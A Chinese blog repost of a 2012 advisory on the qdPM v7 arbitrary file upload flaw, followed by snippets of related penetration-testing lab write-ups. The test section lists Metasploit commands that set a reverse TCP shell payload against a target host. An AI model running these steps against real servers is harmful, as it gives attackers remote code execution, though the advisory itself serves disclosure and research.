php2008上传漏洞,qdPM v7任意PHP文件上传漏洞

最新推荐文章于 2024-07-28 21:13:51 发布
最新推荐文章于 2024-07-28 21:13:51 发布
阅读量160 收藏
点赞数
文章标签: php2008上传漏洞
qdPM v7版本存在一个照片上传功能的漏洞,允许攻击者上传任意文件,可能导致远程代码执行。攻击者可通过Metasploit框架利用此漏洞。目前官方尚未发布补丁,建议用户关注qdPM官网获取最新版本以确保安全。
摘要由CSDN通过智能技术生成

发布日期:2012-09-25

更新日期:2012-11-05

受影响系统:

qdpm qdpm 7

qdpm qdpm

描述:

--------------------------------------------------------------------------------

qdPM是免费的开源的基于Web的项目管理工具。

qdPM v7的用户配置文件的照片上传功能可被利用上传任意文件到受害者服务器,导致远程代码执行。

链接:http://www.metasploit.com/modules/exploit/multi/http/qdpm_upload_exec

http://www.osvdb.org/82978

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ msfconsole

##                          ###          ##    ##

##  ##  #### ###### ####  #####  #####    ##    ####        ######

####### ##  ##  ##  ##        ## ##  ##    ##  ##  ##  ###  ##

####### ######  ##  #####  ####  ##  ##    ##  ##  ##  ##    ##

## # ##    ##  ##  ##  ## ##      #####    ##  ##  ##  ##    ##

##  ##  #### ###  #####  #####    ##  ####  ####  #### ###

##

msf > use exploit/multi/http/qdpm_upload_exec

msf exploit(qdpm_upload_exec) > show payloads

msf exploit(qdpm_upload_exec) > set PAYLOAD generic/shell_reverse_tcp

msf exploit(qdpm_upload_exec) > set LHOST [MY IP ADDRESS]

msf exploit(qdpm_upload_exec) > set PASSWORD [STRING]

msf exploit(qdpm_upload_exec) > set RHOST [TARGET IP]

msf exploit(qdpm_upload_exec) > set USERNAME [STRING]

msf exploit(qdpm_upload_exec) > exploit

建议:

--------------------------------------------------------------------------------

厂商补丁:

qdpm

----

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://qdpm.net/0b1331709591d260c1c78e86d0c51c18.png

黑科技玩机
关注
Zkteco百傲瑞达安防管理系统平台 Shiro反序列化漏洞复现
0xSec
12-02 1355
Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
searchsploit漏洞查找工具使用指南(exploit-db.com 离线工具)
墨痕诉清风的博客
10-29 1930
searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-DB二进制文件中找到。如果您预计您将在一个没有Internet的网络环境进行渗透测试,请确保您检查了两个存储库,以获得最完整的数据集。
doubletrouble靶机之隐写术、脏牛漏洞提权、GTFObins提权、qdPM 9.1CMS漏洞利用
qq_40898302的博客
05-09 577
给exp添加一个执行权限,运行exp会让输入一个密码,然后生成一个firefart的用户,就可以使用这个用户和刚设置的密码以root权限登录服务器。真实环境中需要将/tmp/passwd.bak文件copy回原来的/etc/passwd进行替换。在提取出来的文件内发现了邮箱和一个字符串,尝试到登录后台。通过查看知道图片可以隐写4.7k的信息,并且存在密码。下载Deb格式的 StegSeek(需要用翻墙代理)查看网页源码发现使用qdPM 9.1CMS框架。代码缩进存在问题,进行修复。secret : 秘密。
VulnHub:doubletrouble1
最新发布
Aukum的博客
07-28 1147
Vulnhub——doubletrouble,总共两个靶机,涉及qdpm漏洞利用,sudo提权和内核提权。
vulnhub doubletrouble: 1
箭雨镜屋
04-23 3337
渗透思路:nmap扫描----gobuster扫描网站目录----stegseek爆破图片隐写密码,获得网站用户密码----利用qdPM 9.1远程命令执行(任意文件上传漏洞getshell----awk sudo提权
Vulnhub靶场 渗透测试实战10:ICA: 1
随心所欲不逾矩
11-28 780
管理员的信息存储在qdpm下的 configuration表中,密码是app_administrator_password的值,可以去把源码下载下来看一下。在我看来,在访问系统时有一个弱点。据我所知,可执行文件的内容是部分可见的。我需要找出是否存在漏洞qdPM 9.1 安装。
靶机渗透练习66-ICA
hirak0的博客
04-20 863
靶机描述 靶机地址:https://www.vulnhub.com/entry/ica-1,748/ Description According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We
qdPM_9.1(基于Web的项目管理工具).zip
03-25
qdPM-基于Web的项目管理工具 qdPM是一个基于Web的免费项目管理工具,适用于从事多个项目的小型团队。它是完全可配置的。您可以轻松管理项目,任务和人员。客户使用集成到任务中的票证系统进行交互。与php 5.4+和php...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5657
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 1085
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1262
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶机_DOUBLETROUBLE: 1
学术渣渣的博客
09-14 3521
文章目录靶机介绍渗透过程获取ip端口扫描网站目录扫描图片隐写数据提取登录网站qdPM漏洞利用提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/doubletrouble-1,743/ 难度:简单 描述:get flags 渗透过程 获取ip 靶机IP为192.168.1.113。 arp-scan -l 端口扫描 nmap -A -T4 -p 1-65535 192.168.1.113 靶机开放了22和80端口。 网站目录扫描 首先对网站的特殊文件进行扫描。 dir
php 下载目录,php 实现文件下载
weixin_42494891的博客
03-10 420
//author:heaven//文件下载function download($file_dir,$file_name)//参数说明://file_dir:文件所在目录//file_name:文件名{$file_dir = chop($file_dir);//去掉路径中多余的空格//得出要下载的文件的路径if($file_dir != ''){$file_path = $file_dir;if(s...
vulnhub靶机 doubletrouble
weixin_46107179的博客
05-14 437
靶机下载地址:下载链接 主机发现 因为在同一网段,所以直接用arp-scan -l 扫描,得到靶机ip地址 信息搜集 通过nmap进行信息搜集,得到开放端口22,80,并且有一个标题为qdPM 打开网页进行80端口的查看,发现只是一个登录页面 从中我们可以得到信息是关于qdPM9.1(一款基于Web的开源项目管理工具),从网上可以搜索到相关的命令执行漏洞,我们通过kali里面的searchsploit搜索一下,结果有可以利用的exp 接下来,直接将其两个可远程执行代码的exp拷贝下来,发现这两个的e
2020-10-06
qq_50346832的博客
10-06 206
有会linux 的大神吗
vulnhunb之doubletrouble:1
qwweggfe的博客
09-18 1708
由于这个靶机比较简单,所以我就直接写渗透过程了: 首先进行ip扫描 于是打开网页进行查看 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传漏洞,但是我们又没有用户名密码,于是我进行目录扫描 NVD - CVE-2020-7246 gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html..
文件上传漏洞
Cobra的博客
01-27 1730
文件上传漏洞 1、文件上传漏洞简介 文件上传漏洞就是指攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。 2、文件上传漏洞产生的原因 文件上传漏洞是由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 797
攻击机:192.168.100.128靶机:192.168.100.130。
靶机渗透练习63-doubletrouble
hirak0的博客
04-20 3399
靶机描述 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
php7 qps,PHP7新特性-网站性能提高5-10倍
weixin_42381087的博客
03-17 315
目前来说php7的重大特性基本已经是定型了,PHP7对于上一个系列的PHP5.n,可以说是一个大规模的革新,尤其是在性能方面实现跨越式的大幅提升。首先看一下php版本速度测试和压力测试图:上图为:PHP7的性能测试结果,耗时从2.991下降到1.186,大幅度下降60%。上图为:WordPress的QPS压测,PHP7对比PHP5.6,QPS提升2.77倍。由此可见,php7是个新的趋势。下面介绍...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值